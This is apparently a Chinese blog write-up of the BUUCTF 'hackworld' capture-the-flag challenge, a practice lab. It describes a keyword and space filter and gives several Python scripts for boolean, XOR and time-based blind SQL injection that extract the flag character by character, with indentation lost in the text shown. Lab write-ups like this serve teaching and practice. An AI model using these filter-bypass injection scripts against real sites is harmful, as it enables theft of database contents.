hackworld(盲注,这里可以使用时间,布尔)
根据一波手动测试,知道过滤了&,||,and,or,for,空格,等等; 测试的时候,除了被检验出来的注入,还存在Error Occured When Fetch Result. 和 Hello, glzjin wants a girlfriend. 两种页面,(其实还有一种直接bool(false) 的页面) 所以尝试布尔注入: -1=(23<231)
-1=(23>231)
的确存在布尔报错,好,上脚本:
自己写的极慢的垃圾脚本:
import requests
import re
s=''
url="http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php"
for n in range(1,16):
for m in range(31,127,1):#31 127
id="-1=(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))"%(n,m)
r=requests.session()
m1=r.get(url)
if m1:
exp={"id":id}
f=r.post(url,data=exp)
content=f.text
#print content
#print m
if "Hello, glzjin wants a girlfriend." in content:
print chr(m)
s+=chr(m)
else:
print "no"
print "flag is:"+s
异或:
import requests
import re
s=''
url="http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php"
for n in range(1,16):
for m in range(31,127,1):#31 127
id="1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))"%(n,m)
r=requests.session()
m1=r.get(url)
if m1:
exp={"id":id}
f=r.post(url,data=exp)
content=f.text
#print content
#print m
if "Hello, glzjin wants a girlfriend." in content:
print chr(m)
s+=chr(m)
else:
print "no"
print "flag is:"+s
放个大佬的二分查找脚本:
#!/usr/bin/python
#-*-coding:utf-8 -*-
import requests
import re
def flag_get(start,f,url): #确定start位的字符
a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))'
data = {'id': a }
url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php'
r= requests.post(url, data)
s=r.text
#print(s)
if 'Hello' in s:
return 1
else:
return 0
def flag_find(start,f,url): #确定
a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))'
data = {'id': a }
url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php'
r= requests.post(url, data)
s=r.text
#print(s)
if 'Hello' in s:
return 1
else:
return 0
if __name__ == '__main__':
url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php'
flag_kouhao=125
flag=''
num=1 #从第num位开始爆破
while 1:
start=32 #ascii的起始范围(10进制)
last=126 #ascii的终止范围(10进制)
mid=int((start+last)/2)
while 1:
if(flag_get(num,flag_kouhao,url)):
flag=flag+'}'
print('flag is :'+flag)
exit(1)
print('strat is '+str(start))
print(' mid is '+str(mid))
print('last is '+str(last))
print('****************************************')
if(flag_find(num,mid,url)):
start=mid
mid=int((start+last)/2)
if ((last-start)<5):
break
else:
last=mid
mid=int((start+last)/2)
if ((last-start)<5):
break
print(start)
print(last)
print('****************************************')
for i in range(start,last+1):
print(i)
if(flag_get(num,i,url)):
f=chr(i)
flag=flag+f
print('****************************************')
print(' num is '+str(num))
print('char is '+f)
print('flag is '+flag)
print('****************************************')
break
num=num+1
print(flag)
时间盲注:
大佬脚本:
import requests
def six_six_six(url):
flag = ''
while True:
for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_-':
data = {'id':"sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag+i)}
print(data)
try:
requests.post(url=url,data=data,timeout=1)
except:
flag=flag+i
print('[*]%s'%flag)
break
if i=='}':
break
print('[+]%s'%flag)
url = 'http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php'
six_six_six(url)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
